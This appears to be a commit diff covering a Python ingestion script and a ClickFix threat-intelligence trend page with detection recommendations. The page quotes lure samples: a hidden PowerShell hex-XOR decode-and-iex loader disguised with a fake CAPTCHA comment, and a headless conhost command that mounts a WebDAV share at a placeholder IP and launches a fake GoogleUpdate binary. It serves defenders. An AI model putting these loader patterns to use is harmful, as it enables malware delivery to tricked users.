# publish window it may still hold YESTERDAY's content; writing that under
|
||||
# today's filename would mislabel and double-count it (its real day was
|
||||
# already ingested). Verify the report's own date before accepting.
|
||||
if status != "ok" and d == today:
|
||||
status2, data2, _ = _fetch_json(CONSOLIDATED_URL)
|
||||
if status2 == "ok" and _report_date(data2) == day:
|
||||
status, data, note = "ok", data2, "via consolidated alias"
|
||||
elif status2 == "ok":
|
||||
note = f"consolidated alias is {_report_date(data2) or 'undated'}, not today — skipped"
|
||||
|
||||
async def _process_file(filename: str, file_date: date) -> tuple:
|
||||
"""Fetch pointer → resolve URL → download → parse. Returns (records, skipped)."""
|
||||
date_str = file_date.isoformat()
|
||||
print(f"\n {filename}")
|
||||
if status != "ok":
|
||||
bucket = status if status in ("missing", "lfs_locked") else "errors"
|
||||
stats[bucket] += 1
|
||||
day_status[day] = note or bucket
|
||||
print(f" {day}: skip — {note}")
|
||||
d += timedelta(days=1)
|
||||
continue
|
||||
|
||||
oid, size = await _fetch_lfs_pointer(client, filename, token)
|
||||
if not oid:
|
||||
print(" Skipping — could not read LFS pointer")
|
||||
return [], 1
|
||||
# A 200 that parses but is the wrong shape (dict lacking sites/Sites) is an
|
||||
# upstream schema break, not a quiet day — flag it as an error, not empty.
|
||||
if isinstance(data, dict) and not (data.get("sites") or data.get("Sites")):
|
||||
stats["errors"] += 1
|
||||
day_status[day] = "200 but no sites/Sites key (schema break?)"
|
||||
print(f" {day}: skip — 200 but no sites/Sites key (schema break?)", file=sys.stderr)
|
||||
d += timedelta(days=1)
|
||||
continue
|
||||
|
||||
download_url = await _resolve_lfs_download_url(oid, size, client, token)
|
||||
if not download_url:
|
||||
print(" Skipping — LFS download URL unavailable (budget exceeded?)")
|
||||
return [], 1
|
||||
records = _normalise_day_records(_extract_sites(data), day)
|
||||
if not records:
|
||||
# A real nightly report is ~100 sites; 0 sites on a NON-today day is
|
||||
# almost certainly an upstream break, so surface it on stderr.
|
||||
stats["empty"] += 1
|
||||
day_status[day] = "0 sites"
|
||||
historical = d != today
|
||||
print(f" {day}: 0 sites — not written"
|
||||
+ (" [WARN: unexpected for a historical day]" if historical else ""),
|
||||
file=sys.stderr if historical else sys.stdout)
|
||||
d += timedelta(days=1)
|
||||
continue
|
||||
|
||||
data = await _download_lfs_file(download_url, client)
|
||||
if data is None:
|
||||
print(" Skipping — download failed")
|
||||
return [], 1
|
||||
|
||||
records = _parse_report(data, date_str)
|
||||
print(f" {len(records)} URL records extracted")
|
||||
return records, 0
|
||||
|
||||
results = await asyncio.gather(*[_process_file(n, d) for n, d in recent_files])
|
||||
|
||||
all_records: list = []
|
||||
lfs_skipped = 0
|
||||
seen: set = set()
|
||||
|
||||
for records, skipped in results:
|
||||
lfs_skipped += skipped
|
||||
for r in records:
|
||||
key = (r["url"], r["date"])
|
||||
if key not in seen:
|
||||
seen.add(key)
|
||||
all_records.append(r)
|
||||
|
||||
print(f"\nTotal unique URL records: {len(all_records)}")
|
||||
|
||||
OUTPUT_PATH.write_text(
|
||||
json.dumps(all_records, indent=2, ensure_ascii=False),
|
||||
encoding="utf-8",
|
||||
)
|
||||
print(f"Written: {OUTPUT_PATH}")
|
||||
|
||||
if not all_records:
|
||||
print(
|
||||
"\nNOTE: Zero records written. This is normal if:\n"
|
||||
" - No ClickGrab reports were published in the last 7 days\n"
|
||||
" - The repo's Git LFS bandwidth budget is exhausted (resets monthly)\n"
|
||||
" - GITHUB_TOKEN is missing and the unauthenticated rate limit was hit\n"
|
||||
"Subsequent pipeline steps will run with empty input.",
|
||||
file=sys.stderr,
|
||||
(DAYS_DIR / f"{day}.json").write_text(
|
||||
json.dumps(records, ensure_ascii=False), encoding="utf-8"
|
||||
)
|
||||
stats["days_written"] += 1
|
||||
stats["sites_total"] += len(records)
|
||||
day_status[day] = f"ok ({len(records)} sites)" + (f" {note}" if note else "")
|
||||
print(f" {day}: {len(records)} sites{(' (' + note + ')') if note else ''}")
|
||||
d += timedelta(days=1)
|
||||
|
||||
_write_run_log(CACHE_DIR, "ingest_clickgrab", {
|
||||
"files_found": len(all_files),
|
||||
"files_in_window": len(recent_files),
|
||||
"lfs_skipped": lfs_skipped,
|
||||
"records_ingested": len(all_records),
|
||||
"status": "ok" if all_records else "empty",
|
||||
})
|
||||
LOG_PATH.write_text(json.dumps({
|
||||
"run_utc": datetime.now(timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ"),
|
||||
"range": {"start": start.isoformat(), "end": end.isoformat()},
|
||||
**stats,
|
||||
"per_day": day_status,
|
||||
}, indent=2), encoding="utf-8")
|
||||
|
||||
print(f"\nDays written: {stats['days_written']} "
|
||||
f"sites: {stats['sites_total']} "
|
||||
f"missing: {stats['missing']} lfs_locked: {stats['lfs_locked']} "
|
||||
f"errors: {stats['errors']}")
|
||||
print(f"Cache: {DAYS_DIR}")
|
||||
|
||||
if stats["days_written"] == 0:
|
||||
print("\nWARNING: no days written. If this persists, verify the upstream "
|
||||
"filename format and that recent reports are non-LFS blobs.",
|
||||
file=sys.stderr)
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
asyncio.run(main())
|
||||
main()
|
||||
|
||||
+26
-24
@@ -1,7 +1,7 @@
|
||||
---
|
||||
layout: default
|
||||
title: "ClickFix Delivery Chain: Trend Analysis"
|
||||
description: "10 months of MHaggis ClickGrab data analyzed through the Detection Chokepoint Framework. Tracks cradle family evolution, evasion technique shifts, and staging infrastructure from April 2025 to March 2026."
|
||||
description: "ClickFix delivery-chain trends through the Detection Chokepoint Framework. Behavioural classification from Carson ClickFix Hunter (per-domain clipboard commands) with MHaggis ClickGrab crawl volume. Tracks cradle family rotation, encoding obfuscation, and the inline-payload shift, Aug 2025 – May 2026."
|
||||
permalink: /trends/clickgrab/
|
||||
---
|
||||
|
||||
@@ -201,37 +201,39 @@ details[open] > summary { margin-bottom: 0.4rem; }
|
||||
<h1>ClickFix Delivery Chain: Trend Analysis</h1>
|
||||
<p class="cg-meta">
|
||||
Data: <a href="https://github.com/mhaggis/ClickGrab" target="_blank" rel="noopener">MHaggis ClickGrab</a> + <a href="https://clickfix.carsonww.com/" target="_blank" rel="noopener">ClickFix Hunter</a>
|
||||
· Period: Apr 2025 – May 2026
|
||||
· Period: Aug 2025 – May 2026
|
||||
· {{ site.data.clickgrab_trends.meta.total_reports }} nightly reports + {{ site.data.clickgrab_trends.meta.total_domains }} domains
|
||||
· Generated: {{ site.data.clickgrab_trends.meta.generated }}
|
||||
</p>
|
||||
|
||||
<!-- ── Dataset Overview ──────────────────────────────────────────────── -->
|
||||
<!-- Behavioural cards use the CLEAN per-domain command classification (Carson ClickFix
|
||||
Hunter); only "Sites crawled" is MHaggis site-crawl volume. See DECISIONS #012. -->
|
||||
<div class="cg-stats">
|
||||
<div class="cg-stat">
|
||||
<div class="cg-stat-val">{{ site.data.clickgrab_trends.meta.total_domains }}</div>
|
||||
<div class="cg-stat-lbl">ClickFix domains</div>
|
||||
</div>
|
||||
<div class="cg-stat">
|
||||
<div class="cg-stat-val">{{ site.data.clickgrab_trends.meta.total_sites_crawled | divided_by: 1000 }}k+</div>
|
||||
<div class="cg-stat-lbl">Sites crawled</div>
|
||||
</div>
|
||||
<div class="cg-stat">
|
||||
<div class="cg-stat-val">{{ site.data.clickgrab_trends.meta.total_malicious | divided_by: 1000 }}k+</div>
|
||||
<div class="cg-stat-lbl">Malicious confirmed</div>
|
||||
</div>
|
||||
<div class="cg-stat">
|
||||
<div class="cg-stat-val">{{ site.data.clickgrab_trends.cradles_total.iwr_iex }}</div>
|
||||
<div class="cg-stat-lbl">IWR/IEX cradles</div>
|
||||
</div>
|
||||
<div class="cg-stat">
|
||||
<div class="cg-stat-val">{{ site.data.clickgrab_trends.evasion_totals.base64 }}</div>
|
||||
<div class="cg-stat-lbl">Base64 obfuscated</div>
|
||||
</div>
|
||||
<div class="cg-stat">
|
||||
<div class="cg-stat-val">{{ site.data.clickgrab_trends.cradles_total.msiexec }}</div>
|
||||
<div class="cg-stat-val">{{ site.data.clickgrab_trends.domain_cradles_total.msiexec }}</div>
|
||||
<div class="cg-stat-lbl">MSIExec deliveries</div>
|
||||
</div>
|
||||
<div class="cg-stat">
|
||||
<div class="cg-stat-val">{{ site.data.clickgrab_trends.cradles_total.inline_no_url }}</div>
|
||||
<div class="cg-stat-val">{{ site.data.clickgrab_trends.domain_evasion_totals.no_url }}</div>
|
||||
<div class="cg-stat-lbl">Inline payloads (no URL)</div>
|
||||
</div>
|
||||
<div class="cg-stat">
|
||||
<div class="cg-stat-val">{{ site.data.clickgrab_trends.domain_evasion_totals.base64 }}</div>
|
||||
<div class="cg-stat-lbl">Base64 encoded</div>
|
||||
</div>
|
||||
<div class="cg-stat">
|
||||
<div class="cg-stat-val">{{ site.data.clickgrab_trends.domain_evasion_totals.hex_xor }}</div>
|
||||
<div class="cg-stat-lbl">Hex-XOR payloads</div>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<!-- ── Framework Chain Map ───────────────────────────────────────────── -->
|
||||
@@ -288,7 +290,7 @@ details[open] > summary { margin-bottom: 0.4rem; }
|
||||
</div>
|
||||
|
||||
<div class="cg-callout cg-callout--alert">
|
||||
<strong>May 2026: 95.2% of domains now carry inline payloads.</strong> Up from 75% in April and 47% in March, the no-URL rate has hit a new high. Base64 accounts for 87% of May domains (399/458). A new delivery variant also appeared: <code>conhost --headless cmd /c "pushd \\IP@port\DavWWWRoot && start GoogleUpdate"</code> mounts a WebDAV share and launches a binary impersonating Google Update - no PowerShell, no HTTP fetch, no URL in the clipboard command at all. Your T1105 network-fetch detection never fires. The behavioral chokepoint that does fire: unusual parent process spawning <code>conhost.exe</code> or <code>cmd.exe</code> with a UNC path argument.
|
||||
<strong>May 2026: 95.2% of domains now carry inline payloads.</strong> Up from 69% in April and 46% in March, the no-URL rate has hit a new high. Base64 accounts for 69% of May domains (316/458). A new delivery variant also appeared: <code>conhost --headless cmd /c "pushd \\IP@port\DavWWWRoot && start GoogleUpdate"</code> mounts a WebDAV share and launches a binary impersonating Google Update - no PowerShell, no HTTP fetch, no URL in the clipboard command at all. Your T1105 network-fetch detection never fires. The behavioral chokepoint that does fire: unusual parent process spawning <code>conhost.exe</code> or <code>cmd.exe</code> with a UNC path argument.
|
||||
</div>
|
||||
|
||||
<!-- ── Chart B: Cradle Family Evolution ──────────────────────────────── -->
|
||||
@@ -326,7 +328,7 @@ details[open] > summary { margin-bottom: 0.4rem; }
|
||||
</div>
|
||||
|
||||
<div class="cg-callout cg-callout--warn">
|
||||
<strong>Base64 isn't plateauing. It's now the default.</strong> 19.5% in March, 54.2% in April, <strong>87% in May</strong> (399/458 domains). If your rules match plaintext <code>iwr https://</code> strings, you're seeing the encoded version now, not the decoded cradle. Detect the encoding act: <code>[Convert]::FromBase64String</code> piped to <code>iex</code>. Or detect <code>-enc</code> on the command line from an unusual parent. The content is opaque; the execution context isn't.
|
||||
<strong>Different domains encode differently; the dominant encoder shifted in May.</strong> Through April the inline encoder was hex-XOR (<code>-bxor</code>): 16% of March domains, <strong>54% in April</strong> (97/181). In May base64 jumped to <strong>69%</strong> (316/458) as the domain count nearly tripled, while hex-XOR kept growing in absolute terms (65 → 97 → 105) and fell only as a share (23%). The two sets barely overlap (2 of May's 316 base64 domains also use hex-XOR), and the base64 jump is almost entirely one token (<code>frombase64string</code>, 314 of 316), which reads more like a single campaign cluster than a broad re-tooling. Either way, if your rules match plaintext <code>iwr https://</code> strings you're seeing the encoded version now, not the decoded cradle. Detect the encoding act, not the encoder: <code>[Convert]::FromBase64String</code> piped to <code>iex</code>, the <code>-bxor</code> decode loop, or <code>-enc</code> from an unusual parent. The content is opaque; the execution context isn't.
|
||||
</div>
|
||||
|
||||
<div class="cg-callout cg-callout--warn">
|
||||
@@ -352,7 +354,7 @@ details[open] > summary { margin-bottom: 0.4rem; }
|
||||
<h2 id="inline">Strategic Shift: Inline Payloads Bypassing Network Fetch Detection</h2>
|
||||
<p>Here's the finding that changes the detection calculus: <strong>95% of May 2026 domains have no URL in the clipboard command at all.</strong> Up from 28% in August. The payload is entirely inline. The user pastes everything needed, and nothing reaches out to a staging server. Your network-fetch detection? It never fires.</p>
|
||||
|
||||
<p>Base64 now accounts for 87% of May domains (399/458) - it's not one technique among several, it's the default. Two other techniques appear in smaller numbers: <strong>hex XOR</strong> (<code>$k/$d</code> variable patterns with <code>-bxor</code> decoding, 62 instances in March), and a newer <strong>WebDAV delivery</strong> variant using <code>conhost --headless cmd /c "pushd \\IP@port\DavWWWRoot && start GoogleUpdate"</code> - no PowerShell, no HTTP, nothing to intercept at the network layer. The social engineering does double duty. Fake CAPTCHA comments inside the payload reinforce the lure:</p>
|
||||
<p>Base64 now accounts for 69% of May domains (316/458) - it's not one technique among several, it's the dominant inline encoder. Two other techniques appear in smaller numbers: <strong>hex XOR</strong> (<code>$k/$d</code> variable patterns with <code>-bxor</code> decoding, 65 instances in March), and a newer <strong>WebDAV delivery</strong> variant using <code>conhost --headless cmd /c "pushd \\IP@port\DavWWWRoot && start GoogleUpdate"</code> - no PowerShell, no HTTP, nothing to intercept at the network layer. The social engineering does double duty. Fake CAPTCHA comments inside the payload reinforce the lure:</p>
|
||||
|
||||
<pre class="logic-block rounded-lg p-4 overflow-x-auto text-[.8rem]"><code>powershell -w hidden <# I am not a robot - Cloudflare ID: 8e3f2a #> $k='xK9mP2';$d='4a5b6c...';
|
||||
$b=[byte[]]@();for($i=0;$i-lt$d.Length;$i+=2){$b+=[byte]("0x"+$d.Substring($i,2))-bxor[byte]$k[$i%$k.Length]};
|
||||
@@ -362,7 +364,7 @@ iex([Text.Encoding]::UTF8.GetString($b))</code></pre>
|
||||
<strong>Your network-fetch detection covers 5% of the threat now.</strong> 95% of May 2026 domains skip the remote fetch entirely. You need a parallel detection for the decode-and-execute pattern: unusual parent → PowerShell with <code>-enc</code>, <code>-bxor</code> operations, or <code>[Convert]::FromBase64String</code> piped to <code>iex</code>. Neither detection alone is sufficient anymore. Run both. And if you're not alerting on <code>conhost --headless</code> spawning <code>cmd.exe</code> with a UNC path argument, you have a blind spot for the WebDAV variant entirely.
|
||||
</div>
|
||||
|
||||
<p>Monthly no-URL trend: Aug 28% → Sep 32% → Oct 32% → Nov 6% → Dec 19% → Jan 44% → Feb 30% → Mar 47% → Apr 75% → <strong>May 95%</strong>.</p>
|
||||
<p>Monthly no-URL trend: Aug 28% → Sep 32% → Oct 32% → Nov 6% → Dec 19% → Jan 44% → Feb 30% → Mar 46% → Apr 69% → <strong>May 95%</strong>.</p>
|
||||
|
||||
<h3>Port 5506 C2 Infrastructure Cluster</h3>
|
||||
<p>333 domains call back to port 5506 across 14 IPs in a few /24 ranges. One operator, one port, zero legitimate services using 5506. This is the kind of infrastructure fingerprint that makes network detection easy.</p>
|
||||
@@ -477,7 +479,7 @@ iex([Text.Encoding]::UTF8.GetString($b))</code></pre>
|
||||
<p style="font-size:.75rem;color:var(--text-dim);margin:.25rem 0 .75rem;">Domain names and observation counts are from ClickGrab nightly reports. Hosting type is only classified when verifiable from the domain itself (e.g., <code>*.cdn-website.com</code> = CDN, <code>*.wpengine.com</code> = managed hosting). IP enrichment (ASN, geo, registrar) requires running the enrichment pipeline. Unverified entries show "Unknown."</p>
|
||||
|
||||
<div class="cg-callout cg-callout--alert">
|
||||
<strong>CDN-hosted staging defeats domain blocking.</strong> <code>irp.cdn-website.com</code> appeared in {{ site.data.clickgrab_trends.evasion_totals.cdn_staging }} payload fetches. This is a legitimate CDN used by website builders. Blocking it would impact legitimate sites. Detection must shift to behavioral signals (PowerShell → network → unusual domain path) rather than domain-reputation lookup.
|
||||
<strong>CDN-hosted staging defeats domain blocking.</strong> <code>irp.cdn-website.com</code> appeared in {{ site.data.clickgrab_trends.staging_domains.first.count }} payload fetches. This is a legitimate CDN used by website builders. Blocking it would impact legitimate sites. Detection must shift to behavioral signals (PowerShell → network → unusual domain path) rather than domain-reputation lookup.
|
||||
</div>
|
||||
|
||||
<!-- ── Detection Recommendations ────────────────────────────────────── -->
|
||||
@@ -610,7 +612,7 @@ level: high
|
||||
<span class="det-rec-tier tier-2">T1027</span>
|
||||
<div>
|
||||
<div class="det-rec-title">Detect Base64 decode + execute</div>
|
||||
<div class="det-rec-desc"><code>[Convert]::FromBase64String</code> or <code>[Text.Encoding]::UTF8.GetString</code> followed immediately by <code>iex</code> / <code>Invoke-Expression</code>. The encoding act itself is detectable even when the decoded content is not. This covers the 18× Base64 increase seen in Jan 2026.</div>
|
||||
<div class="det-rec-desc"><code>[Convert]::FromBase64String</code> or <code>[Text.Encoding]::UTF8.GetString</code> followed immediately by <code>iex</code> / <code>Invoke-Expression</code>. The encoding act itself is detectable even when the decoded content is not. Base64 jumped from 6.1% of domains in April 2026 to 69% in May 2026 (316/458).</div>
|
||||
</div>
|
||||
</div>
|
||||
{% if site.data.clickgrab_trends.payload_examples.base64.size > 0 %}
|
||||
@@ -741,7 +743,7 @@ level: high</code></pre>
|
||||
<span class="det-rec-tier tier-2">T1218</span>
|
||||
<div>
|
||||
<div class="det-rec-title">Detect MSIExec fetching packages from non-enterprise URLs</div>
|
||||
<div class="det-rec-desc"><code>msiexec.exe</code> with <code>/i http</code> where the URL is not a known enterprise software source, spawned from <code>cmd.exe</code> or <code>explorer.exe</code> (Run dialog). Covers the 1,027-domain MSIExec delivery campaign that peaked at 87% in Nov 2025.</div>
|
||||
<div class="det-rec-desc"><code>msiexec.exe</code> with <code>/i http</code> where the URL is not a known enterprise software source, spawned from <code>cmd.exe</code> or <code>explorer.exe</code> (Run dialog). Covers the 1,052-domain MSIExec delivery campaign that peaked at 87% in Nov 2025.</div>
|
||||
</div>
|
||||
</div>
|
||||
<details>
|
||||
@@ -786,7 +788,7 @@ level: high</code></pre>
|
||||
<span class="det-rec-tier tier-1">T1059</span>
|
||||
<div>
|
||||
<div class="det-rec-title">Detect inline payload decode-and-execute</div>
|
||||
<div class="det-rec-desc">PowerShell with <code>-enc</code> flag or XOR decode operations (<code>-bxor</code>, <code>[byte]</code>, <code>[char]</code>) spawned from unusual parent (Run dialog chain). Also: <code>[Convert]::FromBase64String</code> followed by <code>iex</code>. Covers the 28% → 75% growth in inline payloads that skip the network fetch entirely. <strong>Run alongside network-fetch detection. Both are needed for full coverage.</strong></div>
|
||||
<div class="det-rec-desc">PowerShell with <code>-enc</code> flag or XOR decode operations (<code>-bxor</code>, <code>[byte]</code>, <code>[char]</code>) spawned from unusual parent (Run dialog chain). Also: <code>[Convert]::FromBase64String</code> followed by <code>iex</code>. Covers the 28% → 95% growth in inline payloads that skip the network fetch entirely. <strong>Run alongside network-fetch detection. Both are needed for full coverage.</strong></div>
|
||||
</div>
|
||||
</div>
|
||||
<details>
|
||||
|
||||
Reference in New Issue
Block a user